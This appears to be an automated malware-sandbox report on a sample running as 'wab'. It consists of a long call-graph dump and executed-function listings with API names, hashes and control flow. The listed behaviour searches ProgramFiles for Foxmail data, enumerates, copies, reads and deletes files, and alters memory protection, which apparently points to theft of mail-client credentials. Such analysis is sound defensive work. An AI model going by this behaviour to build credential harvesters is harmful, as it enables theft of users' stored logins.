__startOneArgErrorHandling 6942->6947 6951 222eb59e 6942->6951 6944 222eb286 6945 222eb8b2 __startOneArgErrorHandling 20 API calls 6944->6945 6946 222eb292 6944->6946 6945->6946 6949 222e2ada _ValidateLocalCookies 5 API calls 6946->6949 6947->6944 6948 222e78a3 __startOneArgErrorHandling 5 API calls 6947->6948 6948->6944 6950 222ea99c 6949->6950 6952 222eb5c1 __raise_exc RaiseException 6951->6952 6953 222eb5bc 6952->6953 6953->6947 6374 222e5303 6377 222e50a5 6374->6377 6386 222e502f 6377->6386 6380 222e502f 5 API calls 6381 222e50c3 6380->6381 6390 222e5000 6381->6390 6384 222e5000 20 API calls 6385 222e50d9 6384->6385 6387 222e5048 6386->6387 6388 222e2ada _ValidateLocalCookies 5 API calls 6387->6388 6389 222e5069 6388->6389 6389->6380 6391 222e500d 6390->6391 6395 222e502a 6390->6395 6392 222e5024 6391->6392 6393 222e571e _free 20 API calls 6391->6393 6394 222e571e _free 20 API calls 6392->6394 6393->6391 6394->6395 6395->6384 6396 222e7103 GetCommandLineA GetCommandLineW 6954 222eaf43 6955 222eaf4d 6954->6955 6956 222eaf59 6954->6956 6955->6956 6957 222eaf52 CloseHandle 6955->6957 6957->6956 6958 222e8640 6961 222e8657 6958->6961 6962 222e8679 6961->6962 6963 222e8665 6961->6963 6964 222e8681 6962->6964 6967 222e8693 6962->6967 6965 222e6368 __dosmaperr 20 API calls 6963->6965 6966 222e6368 __dosmaperr 20 API calls 6964->6966 6968 222e866a 6965->6968 6969 222e8686 6966->6969 6973 222e8652 6967->6973 6974 222e54a7 6967->6974 6971 222e62ac _abort 26 API calls 6968->6971 6972 222e62ac _abort 26 API calls 6969->6972 6971->6973 6972->6973 6975 222e54c4 6974->6975 6981 222e54ba 6974->6981 6976 222e5af6 _abort 38 API calls 6975->6976 6975->6981 6977 222e54e5 6976->6977 6978 222e7a00 __fassign 38 API calls 6977->6978 6979 222e54fe 6978->6979 6982 222e7a2d 6979->6982 6981->6973 6983 222e7a55 6982->6983 6984 222e7a40 6982->6984 6983->6981 6984->6983 6986 222e6d7e 6984->6986 6987 222e6d8a ___DestructExceptionObject 6986->6987 6988 222e5af6 _abort 38 API calls 6987->6988 6990 222e6d94 6988->6990 6991 222e6e18 _abort 6990->6991 6992 222e55a8 _abort 38 API calls 6990->6992 6994 222e571e _free 20 API calls 6990->6994 6995 222e5671 RtlEnterCriticalSection 6990->6995 6996 222e6e0f 6990->6996 6991->6983 6992->6990 6994->6990 6995->6990 6999 222e56b9 RtlLeaveCriticalSection 6996->6999 6998 222e6e16 6998->6990 6999->6998 7268 222e7a80 7269 222e7a8d 7268->7269 7270 222e637b _abort 20 API calls 7269->7270 7271 222e7aa7 7270->7271 7272 222e571e _free 20 API calls 7271->7272 7273 222e7ab3 7272->7273 7274 222e637b _abort 20 API calls 7273->7274 7278 222e7ad9 7273->7278 7275 222e7acd 7274->7275 7277 222e571e _free 20 API calls 7275->7277 7276 222e5eb7 11 API calls 7276->7278 7277->7278 7278->7276 7279 222e7ae5 7278->7279 6397 222e281c 6400 222e2882 6397->6400 6403 222e3550 6400->6403 6402 222e282a 6404 222e355d 6403->6404 6408 222e358a 6403->6408 6405 222e47e5 ___std_exception_copy 21 API calls 6404->6405 6404->6408 6406 222e357a 6405->6406 6406->6408 6409 222e544d 6406->6409 6408->6402 6410 222e545a 6409->6410 6411 222e5468 6409->6411 6410->6411 6414 222e547f 6410->6414 6412 222e6368 __dosmaperr 20 API calls 6411->6412 6417 222e5470 6412->6417 6413 222e62ac _abort 26 API calls 6415 222e547a 6413->6415 6414->6415 6416 222e6368 __dosmaperr 20 API calls 6414->6416 6415->6408 6416->6417 6417->6413 7490 222e4bdd 7491 222e4bec 7490->7491 7492 222e4c08 7490->7492 7491->7492 7493 222e4bf2 7491->7493 7494 222e6d60 51 API calls 7492->7494 7495 222e6368 __dosmaperr 20 API calls 7493->7495 7496 222e4c0f GetModuleFileNameA 7494->7496 7497 222e4bf7 7495->7497 7498 222e4c33 7496->7498 7499 222e62ac _abort 26 API calls 7497->7499 7513 222e4d01 7498->7513 7500 222e4c01 7499->7500 7503 222e4e76 20 API calls 7504 222e4c5d 7503->7504 7505 222e4c66 7504->7505 7506 222e4c72 7504->7506 7507 222e6368 __dosmaperr 20 API calls 7505->7507 7508 222e4d01 38 API calls 7506->7508 7512 222e4c6b 7507->7512 7510 222e4c88 7508->7510 7509 222e571e _free 20 API calls 7509->7500 7511 222e571e _free 20 API calls 7510->7511 7510->7512 7511->7512 7512->7509 7515 222e4d26 7513->7515 7517 222e4d86 7515->7517 7519 222e70eb 7515->7519 7516 222e4c50 7516->7503 7517->7516 7518 222e70eb 38 API calls 7517->7518 7518->7517 7522 222e7092 7519->7522 7523 222e54a7 __fassign 38 API calls 7522->7523 7524 222e70a6 7523->7524 7524->7515 7280 222e4a9a 7281 222e5411 38 API calls 7280->7281 7282 222e4aa2 7281->7282 5746 222e1c5b 5747 222e1c6b ___scrt_fastfail 5746->5747 5750 222e12ee 5747->5750 5749 222e1c87 5751 222e1324 ___scrt_fastfail 5750->5751 5752 222e13b7 GetEnvironmentVariableW 5751->5752 5776 222e10f1 5752->5776 5755 222e10f1 57 API calls 5756 222e1465 5755->5756 5757 222e10f1 57 API calls 5756->5757 5758 222e1479 5757->5758 5759 222e10f1 57 API calls 5758->5759 5760 222e148d 5759->5760 5761 222e10f1 57 API calls 5760->5761 5762 222e14a1 5761->5762 5763 222e10f1 57 API calls 5762->5763 5764 222e14b5 lstrlenW 5763->5764 5765 222e14d9 lstrlenW 5764->5765 5766 222e14d2 5764->5766 5767 222e10f1 57 API calls 5765->5767 5766->5749 5768 222e1501 lstrlenW lstrcatW 5767->5768 5769 222e10f1 57 API calls 5768->5769 5770 222e1539 lstrlenW lstrcatW 5769->5770 5771 222e10f1 57 API calls 5770->5771 5772 222e156b lstrlenW lstrcatW 5771->5772 5773 222e10f1 57 API calls 5772->5773 5774 222e159d lstrlenW lstrcatW 5773->5774 5775 222e10f1 57 API calls 5774->5775 5775->5766 5777 222e1118 ___scrt_fastfail 5776->5777 5778 222e1129 lstrlenW 5777->5778 5789 222e2c40 5778->5789 5781 222e1168 lstrlenW 5782 222e1177 lstrlenW FindFirstFileW 5781->5782 5783 222e11a0 5782->5783 5784 222e11e1 5782->5784 5785 222e11aa 5783->5785 5786 222e11c7 FindNextFileW 5783->5786 5784->5755 5785->5786 5791 222e1000 5785->5791 5786->5783 5787 222e11da FindClose 5786->5787 5787->5784 5790 222e1148 lstrcatW lstrlenW 5789->5790 5790->5781 5790->5782 5792 222e1022 ___scrt_fastfail 5791->5792 5793 222e10af 5792->5793 5794 222e102f lstrcatW lstrlenW 5792->5794 5795 222e10b5 lstrlenW 5793->5795 5806 222e10ad 5793->5806 5796 222e105a lstrlenW 5794->5796 5797 222e106b lstrlenW 5794->5797 5822 222e1e16 5795->5822 5796->5797 5808 222e1e89 lstrlenW 5797->5808 5800 222e1088 GetFileAttributesW 5802 222e109c 5800->5802 5800->5806 5801 222e10ca 5803 222e1e89 5 API calls 5801->5803 5801->5806 5802->5806 5814 222e173a 5802->5814 5805 222e10df 5803->5805 5827 222e11ea 5805->5827 5806->5785 5809 222e2c40 ___scrt_fastfail 5808->5809 5810 222e1ea7 lstrcatW lstrlenW 5809->5810 5811 222e1ec2 5810->5811 5812 222e1ed1 lstrcatW 5810->5812 5811->5812 5813 222e1ec7 lstrlenW 5811->5813 5812->5800 5813->5812 5815 222e1747 ___scrt_fastfail 5814->5815 5842 222e1cca 5815->5842 5819 222e199f 5819->5806 5821 222e1824 ___scrt_fastfail _strlen 5821->5819 5862 222e15da 5821->5862 5823 222e1e29 5822->5823 5826 222e1e4c 5822->5826 5824 222e1e2d lstrlenW 5823->5824 5823->5826 5825 222e1e3f lstrlenW 5824->5825 5824->5826 5825->5826 5826->5801 5828 222e120e ___scrt_fastfail 5827->5828 5829 222e1e89 5 API calls 5828->5829 5830 222e1220 GetFileAttributesW 5829->5830 5831 222e1246 5830->5831 5832 222e1235 5830->5832 5833 222e1e89 5 API calls 5831->5833 5832->5831 5834 222e173a 35 API calls 5832->5834 5835 222e1258 5833->5835 5834->5831 5836 222e10f1 56 API calls 5835->5836 5837 222e126d 5836->5837 5838 222e1e89 5 API calls 5837->5838 5839 222e127f ___scrt_fastfail 5838->5839 5840 222e10f1 56 API calls 5839->5840 5841 222e12e6 5840->5841 5841->5806 5843 222e1cf1 ___scrt_fastfail 5842->5843 5844 222e1d0f CopyFileW CreateFileW 5843->5844 5845 222e1d44 DeleteFileW 5844->5845 5846 222e1d55 GetFileSize 5844->5846 5851 222e1808 5845->5851 5847 222e1ede 22 API calls 5846->5847 5848 222e1d66 ReadFile 5847->5848 5849 222e1d7d CloseHandle DeleteFileW 5848->5849 5850 222e1d94 CloseHandle DeleteFileW 5848->5850 5849->5851 5850->5851 5851->5819 5852 222e1ede 5851->5852 5854 222e222f 5852->5854 5855 222e224e 5854->5855 5858 222e2250 5854->5858 5870 222e474f 5854->5870 5875 222e47e5 5854->5875 5855->5821 5857 222e2908 5859 222e35d2 __CxxThrowException@8 RaiseException 5857->5859 5858->5857 5882 222e35d2 5858->5882 5861 222e2925 5859->5861 5861->5821 5863 222e160c _strcat _strlen 5862->5863 5864 222e163c lstrlenW 5863->5864 5970 222e1c9d 5864->5970 5866 222e1655 lstrcatW lstrlenW 5867 222e1678 5866->5867 5868 222e167e lstrcatW 5867->5868 5869 222e1693 ___scrt_fastfail 5867->5869 5868->5869 5869->5821 5885 222e4793 5870->5885 5873 222e478f 5873->5854 5874 222e4765 5891 222e2ada 5874->5891 5880 222e56d0 _abort 5875->5880 5876 222e570e 5904 222e6368 5876->5904 5877 222e56f9 RtlAllocateHeap 5879 222e570c 5877->5879 5877->5880 5879->5854 5880->5876 5880->5877 5881 222e474f _abort 7 API calls 5880->5881 5881->5880 5883 222e35f2 RaiseException 5882->5883 5883->5857 5886 222e479f ___DestructExceptionObject 5885->5886 5898 222e5671 RtlEnterCriticalSection 5886->5898 5888 222e47aa 5899 222e47dc 5888->5899 5890 222e47d1 _abort 5890->5874 5892 222e2ae5 IsProcessorFeaturePresent 5891->5892 5893 222e2ae3 5891->5893 5895 222e2b58 5892->5895 5893->5873 5903 222e2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5895->5903 5897 222e2c3b 5897->5873 5898->5888 5902 222e56b9 RtlLeaveCriticalSection 5899->5902 5901 222e47e3 5901->5890 5902->5901 5903->5897 5907 222e5b7a GetLastError 5904->5907 5908 222e5b99 5907->5908 5909 222e5b93 5907->5909 5913 222e5bf0 SetLastError 5908->5913 5933 222e637b 5908->5933 5926 222e5e08 5909->5926 5916 222e5bf9 5913->5916 5914 222e5bb3 5940 222e571e 5914->5940 5916->5879 5919 222e5bb9 5921 222e5be7 SetLastError 5919->5921 5920 222e5bcf 5953 222e593c 5920->5953 5921->5916 5924 222e571e _free 17 API calls 5925 222e5be0 5924->5925 5925->5913 5925->5921 5958 222e5c45 5926->5958 5928 222e5e2f 5929 222e5e47 TlsGetValue 5928->5929 5930 222e5e3b 5928->5930 5929->5930 5931 222e2ada _ValidateLocalCookies 5 API calls 5930->5931 5932 222e5e58 5931->5932 5932->5908 5938 222e6388 _abort 5933->5938 5934 222e63c8 5937 222e6368 __dosmaperr 19 API calls 5934->5937 5935 222e63b3 RtlAllocateHeap 5936 222e5bab 5935->5936 5935->5938 5936->5914 5946 222e5e5e 5936->5946 5937->5936 5938->5934 5938->5935 5939 222e474f _abort 7 API calls 5938->5939 5939->5938 5941 222e5729 HeapFree 5940->5941 5942 222e5752 __dosmaperr 5940->5942 5941->5942 5943 222e573e 5941->5943 5942->5919 5944 222e6368 __dosmaperr 18 API calls 5943->5944 5945 222e5744 GetLastError 5944->5945 5945->5942 5947 222e5c45 _abort 5 API calls 5946->5947 5948 222e5e85 5947->5948 5949 222e5ea0 TlsSetValue 5948->5949 5950 222e5e94 5948->5950 5949->5950 5951 222e2ada _ValidateLocalCookies 5 API calls 5950->5951 5952 222e5bc8 5951->5952 5952->5914 5952->5920 5964 222e5914 5953->5964 5961 222e5c71 5958->5961 5963 222e5c75 __crt_fast_encode_pointer 5958->5963 5959 222e5c95 5962 222e5ca1 GetProcAddress 5959->5962 5959->5963 5960 222e5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5960->5961 5961->5959 5961->5960 5961->5963 5962->5963 5963->5928 5965 222e5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 5964->5965 5966 222e5938 5965->5966 5967 222e58c4 5966->5967 5968 222e5758 _abort 20 API calls 5967->5968 5969 222e58e8 5968->5969 5969->5924 5971 222e1ca6 _strlen 5970->5971 5971->5866 7525 222e20db 7526 222e20e7 ___DestructExceptionObject 7525->7526 7527 222e2110 dllmain_raw 7526->7527 7532 222e210b 7526->7532 7537 222e20f6 7526->7537 7528 222e212a 7527->7528 7527->7537 7538 222e1eec 7528->7538 7530 222e2177 7531 222e1eec 31 API calls 7530->7531 7530->7537 7533 222e218a 7531->7533 7532->7530 7534 222e1eec 31 API calls 7532->7534 7532->7537 7535 222e2193 dllmain_raw 7533->7535 7533->7537 7536 222e216d dllmain_raw 7534->7536 7535->7537 7536->7530 7539 222e1f2a dllmain_crt_process_detach 7538->7539 7540 222e1ef7 7538->7540 7541 222e1f06 7539->7541 7542 222e1f1c dllmain_crt_process_attach 7540->7542 7543 222e1efc 7540->7543 7541->7532 7542->7541 7544 222e1f12 7543->7544 7545 222e1f01 7543->7545 7553 222e23ec 7544->7553 7545->7541 7548 222e240b 7545->7548 7561 222e53e5 7548->7561 7654 222e3513 7553->7654 7556 222e23f5 7556->7541 7559 222e2408 7559->7541 7560 222e351e 7 API calls 7560->7556 7567 222e5aca 7561->7567 7564 222e351e 7643 222e3820 7564->7643 7566 222e2415 7566->7541 7568 222e5ad4 7567->7568 7569 222e2410 7567->7569 7570 222e5e08 _abort 11 API calls 7568->7570 7569->7564 7571 222e5adb 7570->7571 7571->7569 7572 222e5e5e _abort 11 API calls 7571->7572 7573 222e5aee 7572->7573 7575 222e59b5 7573->7575 7576 222e59d0 7575->7576 7577 222e59c0 7575->7577 7576->7569 7581 222e59d6 7577->7581 7580 222e571e _free 20 API calls 7580->7576 7582 222e59e9 7581->7582 7583 222e59ef 7581->7583 7584 222e571e _free 20 API calls 7582->7584 7585 222e571e _free 20 API calls 7583->7585 7584->7583 7586 222e59fb 7585->7586 7587 222e571e _free 20 API calls 7586->7587 7588 222e5a06 7587->7588 7589 222e571e _free 20 API calls 7588->7589 7590 222e5a11 7589->7590 7591 222e571e _free 20 API calls 7590->7591 7592 222e5a1c 7591->7592 7593 222e571e _free 20 API calls 7592->7593 7594 222e5a27 7593->7594 7595 222e571e _free 20 API calls 7594->7595 7596 222e5a32 7595->7596 7597 222e571e _free 20 API calls 7596->7597 7598 222e5a3d 7597->7598 7599 222e571e _free 20 API calls 7598->7599 7600 222e5a48 7599->7600 7601 222e571e _free 20 API calls 7600->7601 7602 222e5a56 7601->7602 7607 222e589c 7602->7607 7613 222e57a8 7607->7613 7609 222e58c0 7610 222e58ec 7609->7610 7626 222e5809 7610->7626 7612 222e5910 7612->7580 7614 222e57b4 ___DestructExceptionObject 7613->7614 7621 222e5671 RtlEnterCriticalSection 7614->7621 7616 222e57e8 7622 222e57fd 7616->7622 7618 222e57f5 _abort 7618->7609 7619 222e57be 7619->7616 7620 222e571e _free 20 API calls 7619->7620 7620->7616 7621->7619 7625 222e56b9 RtlLeaveCriticalSection 7622->7625 7624 222e5807 7624->7618 7625->7624 7627 222e5815 ___DestructExceptionObject 7626->7627 7634 222e5671 RtlEnterCriticalSection 7627->7634 7629 222e581f 7635 222e5a7f 7629->7635 7631 222e5832 7639 222e5848 7631->7639 7633 222e5840 _abort 7633->7612 7634->7629 7636 222e5ab5 __fassign 7635->7636 7637 222e5a8e __fassign 7635->7637 7636->7631 7637->7636 7638 222e7cc2 __fassign 20 API calls 7637->7638 7638->7636 7642 222e56b9 RtlLeaveCriticalSection 7639->7642 7641 222e5852 7641->7633 7642->7641 7644 222e382d 7643->7644 7648 222e384b ___vcrt_freefls@4 7643->7648 7645 222e383b 7644->7645 7649 222e3b67 7644->7649 7647 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7645->7647 7647->7648 7648->7566 7650 222e3a82 try_get_function 5 API calls 7649->7650 7651 222e3b81 7650->7651 7652 222e3b99 TlsGetValue 7651->7652 7653 222e3b8d 7651->7653 7652->7653 7653->7645 7660 222e3856 7654->7660 7656 222e23f1 7656->7556 7657 222e53da 7656->7657 7658 222e5b7a _abort 20 API calls 7657->7658 7659 222e23fd 7658->7659 7659->7559 7659->7560 7661 222e385f 7660->7661 7662 222e3862 GetLastError 7660->7662 7661->7656 7663 222e3b67 ___vcrt_FlsGetValue 6 API calls 7662->7663 7664 222e3877 7663->7664 7665 222e38dc SetLastError 7664->7665 7666 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7664->7666 7671 222e3896 7664->7671 7665->7656 7667 222e3890 7666->7667 7668 222e38b8 7667->7668 7669 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7667->7669 7667->7671 7670 222e3ba2 ___vcrt_FlsSetValue 6 API calls 7668->7670 7668->7671 7669->7668 7670->7671 7671->7665 6418 222e2418 6419 222e2420 ___scrt_release_startup_lock 6418->6419 6422 222e47f5 6419->6422 6421 222e2448 6423 222e4808 6422->6423 6424 222e4804 6422->6424 6427 222e4815 6423->6427 6424->6421 6428 222e5b7a _abort 20 API calls 6427->6428 6431 222e482c 6428->6431 6429 222e2ada _ValidateLocalCookies 5 API calls 6430 222e4811 6429->6430 6430->6421 6431->6429 7672 222e4ed7 7673 222e6d60 51 API calls 7672->7673 7674 222e4ee9 7673->7674 7683 222e7153 GetEnvironmentStringsW 7674->7683 7677 222e4ef4 7679 222e571e _free 20 API calls 7677->7679 7680 222e4f29 7679->7680 7681 222e4eff 7682 222e571e _free 20 API calls 7681->7682 7682->7677 7684 222e716a 7683->7684 7694 222e71bd 7683->7694 7687 222e7170 WideCharToMultiByte 7684->7687 7685 222e4eee 7685->7677 7695 222e4f2f 7685->7695 7686 222e71c6 FreeEnvironmentStringsW 7686->7685 7688 222e718c 7687->7688 7687->7694 7689 222e56d0 21 API calls 7688->7689 7690 222e7192 7689->7690 7691 222e7199 WideCharToMultiByte 7690->7691 7692 222e71af 7690->7692 7691->7692 7693 222e571e _free 20 API calls 7692->7693 7693->7694 7694->7685 7694->7686 7696 222e4f44 7695->7696 7697 222e637b _abort 20 API calls 7696->7697 7698 222e4f6b 7697->7698 7699 222e4fcf 7698->7699 7702 222e637b _abort 20 API calls 7698->7702 7703 222e4fd1 7698->7703 7705 222e544d ___std_exception_copy 26 API calls 7698->7705 7708 222e4ff3 7698->7708 7710 222e571e _free 20 API calls 7698->7710 7700 222e571e _free 20 API calls 7699->7700 7701 222e4fe9 7700->7701 7701->7681 7702->7698 7704 222e5000 20 API calls 7703->7704 7706 222e4fd7 7704->7706 7705->7698 7707 222e571e _free 20 API calls 7706->7707 7707->7699 7709 222e62bc _abort 11 API calls 7708->7709 7711 222e4fff 7709->7711 7710->7698 7712 222e73d5 7713 222e73e1 ___DestructExceptionObject 7712->7713 7724 222e5671 RtlEnterCriticalSection 7713->7724 7715 222e73e8 7725 222e8be3 7715->7725 7717 222e73f7 7718 222e7406 7717->7718 7738 222e7269 GetStartupInfoW 7717->7738 7749 222e7422 7718->7749 7721 222e7417 _abort 7724->7715 7726 222e8bef ___DestructExceptionObject 7725->7726 7727 222e8bfc 7726->7727 7728 222e8c13 7726->7728 7730 222e6368 __dosmaperr 20 API calls 7727->7730 7752 222e5671 RtlEnterCriticalSection 7728->7752 7732 222e8c01 7730->7732 7731 222e8c1f 7737 222e8c4b 7731->7737 7753 222e8b34 7731->7753 7733 222e62ac _abort 26 API calls 7732->7733 7735 222e8c0b _abort 7733->7735 7735->7717 7760 222e8c72 7737->7760 7739 222e7318 7738->7739 7740 222e7286 7738->7740 7744 222e731f 7739->7744 7740->7739 7741 222e8be3 27 API calls 7740->7741 7742 222e72af 7741->7742 7742->7739 7743 222e72dd GetFileType 7742->7743 7743->7742 7745 222e7326 7744->7745 7746 222e7369 GetStdHandle 7745->7746 7747 222e73d1 7745->7747 7748 222e737c GetFileType 7745->7748 7746->7745 7747->7718 7748->7745 7764 222e56b9 RtlLeaveCriticalSection 7749->7764 7751 222e7429 7751->7721 7752->7731 7754 222e637b _abort 20 API calls 7753->7754 7756 222e8b46 7754->7756 7755 222e8b53 7757 222e571e _free 20 API calls 7755->7757 7756->7755 7758 222e5eb7 11 API calls 7756->7758 7759 222e8ba5 7757->7759 7758->7756 7759->7731 7763 222e56b9 RtlLeaveCriticalSection 7760->7763 7762 222e8c79 7762->7735 7763->7762 7764->7751 7283 222e3c90 RtlUnwind 7765 222e36d0 7766 222e36e2 7765->7766 7768 222e36f0 @_EH4_CallFilterFunc@8 7765->7768 7767 222e2ada _ValidateLocalCookies 5 API calls 7766->7767 7767->7768 7000 222e5351 7001 222e5374 7000->7001 7002 222e5360 7000->7002 7003 222e571e _free 20 API calls 7001->7003 7002->7001 7004 222e571e _free 20 API calls 7002->7004 7005 222e5386 7003->7005 7004->7001 7006 222e571e _free 20 API calls 7005->7006 7007 222e5399 7006->7007 7008 222e571e _free 20 API calls 7007->7008 7009 222e53aa 7008->7009 7010 222e571e _free 20 API calls 7009->7010 7011 222e53bb 7010->7011

                                                Executed Functions

                                                Function 222E10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 222E1137
                                                • lstrcatW.KERNEL32(?,?), ref: 222E1151
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E115C
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E116D
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E117C
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 222E1193
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 222E11D0
                                                • FindClose.KERNEL32(00000000), ref: 222E11DB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                • String ID:
                                                • API String ID: 1083526818-0
                                                • Opcode ID: 1557d46e8d2bd2de1d5745b92d7b741cee897dcfc3def83c027833ac3ff3e2c3
                                                • Instruction ID: 12bac6bdae2161f0234e5c3ef7e7d9341bdf17f745c9655f942fbc2b63979f43
                                                • Opcode Fuzzy Hash: 1557d46e8d2bd2de1d5745b92d7b741cee897dcfc3def83c027833ac3ff3e2c3
                                                • Instruction Fuzzy Hash: A921E172544318ABC724EA64DC4CF8B7B9CEF84314F440D2ABA59D30A0EB75EA048792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 222E1434
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 222E1137
                                                  • Part of subcall function 222E10F1: lstrcatW.KERNEL32(?,?), ref: 222E1151
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E115C
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E116D
                                                  • Part of subcall function 222E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 222E117C
                                                  • Part of subcall function 222E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 222E1193
                                                  • Part of subcall function 222E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 222E11D0
                                                  • Part of subcall function 222E10F1: FindClose.KERNEL32(00000000), ref: 222E11DB
                                                • lstrlenW.KERNEL32(?), ref: 222E14C5
                                                • lstrlenW.KERNEL32(?), ref: 222E14E0
                                                • lstrlenW.KERNEL32(?,?), ref: 222E150F
                                                • lstrcatW.KERNEL32(00000000), ref: 222E1521
                                                • lstrlenW.KERNEL32(?,?), ref: 222E1547
                                                • lstrcatW.KERNEL32(00000000), ref: 222E1553
                                                • lstrlenW.KERNEL32(?,?), ref: 222E1579
                                                • lstrcatW.KERNEL32(00000000), ref: 222E1585
                                                • lstrlenW.KERNEL32(?,?), ref: 222E15AB
                                                • lstrcatW.KERNEL32(00000000), ref: 222E15B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                • String ID: )$Foxmail$ProgramFiles
                                                • API String ID: 672098462-2938083778
                                                • Opcode ID: c8115d28204819cb27ccf898f407b599c1bd126fcc7b5c62eadfbf70c19fb4be
                                                • Instruction ID: f06316f0886d5cb0b921d7311a974f757f985bb39c36cbc9078921b51b41f89d
                                                • Opcode Fuzzy Hash: c8115d28204819cb27ccf898f407b599c1bd126fcc7b5c62eadfbf70c19fb4be
                                                • Instruction Fuzzy Hash: 3381D671A40368A9DB20DBA1DC85FDF737DEF84700F4005A6F909E7194EAB26E84CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222EC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleA.KERNEL32(222EC7DD), ref: 222EC7E6
                                                • GetModuleHandleA.KERNEL32(?,222EC7DD), ref: 222EC838
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 222EC860
                                                  • Part of subcall function 222EC803: GetProcAddress.KERNEL32(00000000,222EC7F4), ref: 222EC804
                                                  • Part of subcall function 222EC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC816
                                                  • Part of subcall function 222EC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC82A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                • String ID:
                                                • API String ID: 2099061454-0
                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction ID: 148634687d4a03ebdb54a1ff017ca713634c7043919b5fedcede1419920d4f54
                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction Fuzzy Hash: 9001261054534238A617D2F40F05AAA5FD89B23664BD03756E27FC619FC9A3B901F3A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222EC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 79 222ec7a7-222ec7bc 80 222ec7be-222ec7c6 79->80 81 222ec82d 79->81 80->81 83 222ec7c8-222ec7f6 call 222ec7e6 80->83 82 222ec82f-222ec833 81->82 84 222ec835-222ec83d GetModuleHandleA 82->84 85 222ec872 call 222ec877 82->85 91 222ec86c-222ec86e 83->91 92 222ec7f8 83->92 88 222ec83f-222ec847 84->88 88->88 90 222ec849-222ec84c 88->90 90->82 95 222ec84e-222ec850 90->95 93 222ec866-222ec86b 91->93 94 222ec870 91->94 96 222ec7fa-222ec7fe 92->96 97 222ec85b-222ec85e 92->97 93->91 94->90 99 222ec856-222ec85a 95->99 100 222ec852-222ec854 95->100 102 222ec865 96->102 103 222ec800-222ec80b GetProcAddress 96->103 101 222ec85f-222ec860 GetProcAddress 97->101 99->97 100->101 101->102 102->93 103->81 104 222ec80d-222ec81a VirtualProtect 103->104 105 222ec82c 104->105 106 222ec81c-222ec82a VirtualProtect 104->106 105->81 106->105
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,222EC7DD), ref: 222EC838
